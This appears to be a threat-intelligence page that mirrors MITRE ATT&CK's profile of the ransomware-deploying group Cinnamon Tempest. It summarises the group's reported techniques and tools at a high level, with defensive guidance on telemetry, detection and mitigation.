G1021: Cinnamon Tempest
Cinnamon Tempest is a China-based threat group that has been active since at least 2021 deploying multiple strains of ransomware based on the leaked Babuk source code. Cinnamon Tempest does not operate their ransomware on an affiliate model or purchase access but appears to act independently in all stages of the attack lifecycle. Based on victimology, the short lifespan of each ransomware variant, and use of malware attributed to government-sponsored threat groups, Cinnamon Tempest may be motivated by intellectual property theft or cyberespionage rather than financial gain.[1][2][3][4]
Analyst context for executives and security teams
Cinnamon Tempest matters because ATT&CK describes a ransomware-deploying group whose activity may also support intellectual property theft or cyberespionage rather than simple financial extortion. For leaders, the practical issue is not just ransomware recovery; it is whether the organization can detect credential abuse, lateral movement, tool staging, cloud-storage exfiltration, and disruption risk before encryption or data loss decisions become urgent.
Executive priority
Prioritize this as a resilience and sensitive-data risk scenario. The ATT&CK relationships point to valid account abuse, public-facing application exploitation, Windows administrative execution, Group Policy modification, file transfer, proxy/tunneling, exfiltration to cloud storage, and ransomware affecting Windows and ESXi. Executives should ask whether identity controls, internet-facing vulnerability management, backup/restore readiness, ESXi recovery, and incident response decision authority are tested together—not treated as separate control domains.
Technical view
MITRE provides no group-level detection text, so coverage should be validated from the related techniques and software. SOC and IR teams should test visibility for Windows execution via WMI, PowerShell, and command shell; lateral movement over SMB/admin shares; domain account misuse; GPO and Windows service changes; ingress tool transfer; proxy or tunneled C2; Rclone-like cloud-storage transfers; and ransomware-relevant activity on Windows and ESXi. Relationship context includes PlugX, Cobalt Strike, Impacket, Sliver, Pandora, Rclone, Cheerscrypt, and HUI Loader, so detections should focus on behaviors and control-plane evidence rather than relying only on tool names or hashes.
Likely telemetry
- Identity provider and Active Directory authentication logs, including privileged and domain account activity
- Endpoint process, command-line, PowerShell, WMI, service creation/modification, and DLL loading telemetry on Windows systems
- SMB, Windows admin share, and SYSVOL/GPO change evidence
- EDR or host telemetry for tool staging, script execution, deobfuscation, and unusual file writes
- Network proxy, DNS, firewall, and flow logs for proxying, tunneling, external tool transfer, and C2-like patterns
Detection direction
- Validate detections against behavior chains: public-facing access or credential abuse followed by administrative execution, lateral movement, tool transfer, exfiltration, and ransomware staging.
- Tune for legitimate administration noise around WMI, PowerShell, Windows command shell, SMB admin shares, GPO changes, and Windows service changes; require context such as account role, source host, timing, and change ticket status.
- Do not depend solely on signatures for Cobalt Strike, Sliver, Impacket, Rclone, PlugX, HUI Loader, Pandora, or Cheerscrypt because several are legitimate or dual-use tools and may vary by deployment.
- Confirm visibility into ESXi and virtualization management planes if they support critical workloads, since related ransomware context includes ESXi as well as Windows.
- Correlate cloud-storage egress and Rclone-like behavior with endpoint execution and identity context to distinguish approved synchronization from suspicious bulk transfer.
Mitigation priorities
- Harden identity first: enforce least privilege, privileged access review, strong authentication, service account governance, and rapid credential revocation procedures.
- Reduce initial-access exposure through disciplined patching, configuration review, and monitoring of internet-facing applications and services.
- Restrict and monitor administrative pathways such as SMB admin shares, WMI, PowerShell, remote command execution, GPO modification, and service creation.
- Control tool transfer and exfiltration paths with egress governance, cloud-storage usage policy, proxy logging, and alerting on unusual transfer patterns.
- Prepare for ransomware operations by validating immutable/offline backups, ESXi recovery procedures, segmentation, and executive incident decision playbooks.
Analyst notes and limits
The most important decision value is the overlap between ransomware operations and possible IP or espionage motivation noted by MITRE. That means response planning should include both restoration and data-compromise investigation. The related techniques emphasize identity, Windows administration, cloud-storage exfiltration, and virtualization risk; these are the control areas most likely to determine whether defenders see the activity early.
The group object has no specified platforms, tactics, or official detection text. Platform and tactic guidance above is inferred only from supplied ATT&CK relationships to techniques and software, not from a complete procedure list. Local telemetry, asset exposure, and business process context are required before assessing actual risk or detection coverage.
Cinnamon Tempest
Cinnamon Tempest is a China-based threat group that has been active since at least 2021 deploying multiple strains of ransomware based on the leaked Babuk source code. Cinnamon Tempest does not operate their ransomware on an affiliate model or purchase access but appears to act independently in all stages of the attack lifecycle. Based on victimology, the short lifespan of each ransomware variant, and use of malware attributed to government-sponsored threat groups, Cinnamon Tempest may be motivated by intellectual property theft or cyberespionage rather than financial gain.[1][2][3][4]
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1047 | Windows Management Instrumentation | Cinnamon Tempest has used Impacket for lateral movement via WMI.CitationMicrosoft Ransomware as a ServiceCitationSygnia Emperor Dragonfly October 2022 |
| Enterprise | T1574.001 | DLL Sub-technique | Cinnamon Tempest has used search order hijacking to launch Cobalt Strike Beacons.CitationMicrosoft Ransomware as a ServiceCitationSecureWorks BRONZE STARLIGHT Ransomware Operations June 2022 Cinnamon Tempest has also abused legitimate executables to side-load weaponized DLLs.CitationSygnia Emperor Dragonfly October 2022 |
| Enterprise | T1105 | Ingress Tool Transfer | Cinnamon Tempest has downloaded files, including Cobalt Strike, to compromised hosts.CitationSygnia Emperor Dragonfly October 2022 |
| Enterprise | T1484.001 | Group Policy Modification Sub-technique | Cinnamon Tempest has used Group Policy to deploy batch scripts for ransomware deployment.CitationMicrosoft Ransomware as a Service |
| Enterprise | T1567.002 | Exfiltration to Cloud Storage Sub-technique | Cinnamon Tempest has uploaded captured keystroke logs to the Alibaba Cloud Object Storage Service, Aliyun OSS.CitationSygnia Emperor Dragonfly October 2022 |
| Enterprise | T1588.002 | Tool Sub-technique | Cinnamon Tempest has used open-source tools including customized versions of the Iox proxy tool, NPS tunneling tool, Meterpreter, and a keylogger that uploads data to Alibaba cloud storage.CitationSygnia Emperor Dragonfly October 2022CitationSecureWorks BRONZE STARLIGHT Ransomware Operations June 2022 |
| Enterprise | T1078 | Valid Accounts | Cinnamon Tempest has used compromised user accounts to deploy payloads and create system services.CitationSygnia Emperor Dragonfly October 2022 |
| Enterprise | T1657 | Financial Theft | Cinnamon Tempest has maintained leak sites for exfiltrated data in attempt to extort victims into paying a ransom.CitationMicrosoft Ransomware as a Service |
| Enterprise | T1090 | Proxy | Cinnamon Tempest has used a customized version of the Iox port-forwarding and proxy tool.CitationSygnia Emperor Dragonfly October 2022 |
| Enterprise | T1078.002 | Domain Accounts Sub-technique | Cinnamon Tempest has obtained highly privileged credentials such as domain administrator in order to deploy malware.CitationMicrosoft Ransomware as a Service |
| Enterprise | T1190 | Exploit Public-Facing Application | Cinnamon Tempest has exploited multiple unpatched vulnerabilities for initial access including vulnerabilities in Microsoft Exchange, Manage Engine AdSelfService Plus, Confluence, and Log4j.CitationMicrosoft Ransomware as a ServiceCitationMicrosoft Log4j Vulnerability Exploitation December 2021CitationSygnia Emperor Dragonfly October 2022CitationSecureWorks BRONZE STARLIGHT Ransomware Operations June 2022 |
| Enterprise | T1059.006 | Python Sub-technique | Cinnamon Tempest has used a customized version of the Impacket wmiexec.py module to create renamed output files.CitationMicrosoft Ransomware as a Service |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | Cinnamon Tempest has used weaponized DLLs to load and decrypt payloads.CitationSygnia Emperor Dragonfly October 2022 |
| Enterprise | T1021.002 | SMB/Windows Admin Shares Sub-technique | Cinnamon Tempest has used SMBexec for lateral movement.CitationSygnia Emperor Dragonfly October 2022 |
| Enterprise | T1572 | Protocol Tunneling | Cinnamon Tempest has used the Iox and NPS proxy and tunneling tools in combination create multiple connections through a single tunnel.CitationSygnia Emperor Dragonfly October 2022 |
| Enterprise | T1080 | Taint Shared Content | Cinnamon Tempest has deployed ransomware from a batch file in a network share.CitationMicrosoft Ransomware as a Service |
| Enterprise | T1543.003 | Windows Service Sub-technique | Cinnamon Tempest has created system services to establish persistence for deployed tooling.CitationSygnia Emperor Dragonfly October 2022 |
| Enterprise | T1059.001 | PowerShell Sub-technique | Cinnamon Tempest has used PowerShell to communicate with C2, download files, and execute reconnaissance commands.CitationSygnia Emperor Dragonfly October 2022 |
| Enterprise | T1059.003 | Windows Command Shell Sub-technique | Cinnamon Tempest has executed ransomware using batch scripts deployed via GPO.CitationMicrosoft Ransomware as a Service |
Groups, software, and campaigns
S0633: Sliver
S0664: Pandora
Pandora is a multistage kernel rootkit with backdoor functionality that has been in use by Threat Group-3390 since at least 2020.[1]
S0013: PlugX
S1096: Cheerscrypt
Cheerscrypt is a ransomware that was developed by Cinnamon Tempest and has been used in attacks against ESXi and Windows environments since at least 2022. Cheerscrypt was derived from the leaked Babuk source code and has infrastructure overlaps with deployments of Night Sky ransomware, which was also derived from Babuk.[1][2]
S0357: Impacket
S0154: Cobalt Strike
Cobalt Strike is a commercial, full-featured, remote access tool that bills itself as “adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors”. Cobalt Strike’s interactive post-exploit capabilities cover the full range of ATT&CK tactics, all executed within a single, integrated system.[1]
In addition to its own capabilities, Cobalt Strike leverages the capabilities of other well-known tools such as Metasploit and Mimikatz.[1]
S1097: HUI Loader
HUI Loader is a custom DLL loader that has been used since at least 2015 by China-based threat groups including Cinnamon Tempest and menuPass to deploy malware on compromised hosts. HUI Loader has been observed in campaigns loading SodaMaster, PlugX, Cobalt Strike, Komplex, and several strains of ransomware.[1]
S1040: Rclone
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.0 | Current bundle | c8ebd5578d48… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
Microsoft Ransomware as a Service
Microsoft. (2022, May 9). Ransomware as a service: Understanding the cybercrime gig economy and how to protect yourself. Retrieved March 10, 2023.
Open source URL -
[2]
Microsoft Threat Actor Naming July 2023
Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.
Open source URL -
[3]
Trend Micro Cheerscrypt May 2022
Dela Cruz, A. et al. (2022, May 25). New Linux-Based Ransomware Cheerscrypt Targeting ESXi Devices Linked to Leaked Babuk Source Code. Retrieved December 19, 2023.
Open source URL -
[4]
SecureWorks BRONZE STARLIGHT Ransomware Operations June 2022
Counter Threat Unit Research Team . (2022, June 23). BRONZE STARLIGHT RANSOMWARE OPERATIONS USE HUI LOADER. Retrieved December 7, 2023.
Open source URL -
[5]
BRONZE STARLIGHT
(Citation: Dell SecureWorks BRONZE STARLIGHT Profile)
-
[6]
DEV-0401
(Citation: Microsoft Threat Actor Naming July 2023)
-
[7]
Dell SecureWorks BRONZE STARLIGHT Profile
SecureWorks. (n.d.). BRONZE STARLIGHT. Retrieved December 6, 2023.
Open source URL -
[8]
Emperor Dragonfly
(Citation: Sygnia Emperor Dragonfly October 2022)
-
[9]
Sygnia Emperor Dragonfly October 2022
Biderman, O. et al. (2022, October 3). REVEALING EMPEROR DRAGONFLY: NIGHT SKY AND CHEERSCRYPT - A SINGLE RANSOMWARE GROUP. Retrieved December 6, 2023.
Open source URL -
[10]
mitre-attack G1021Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.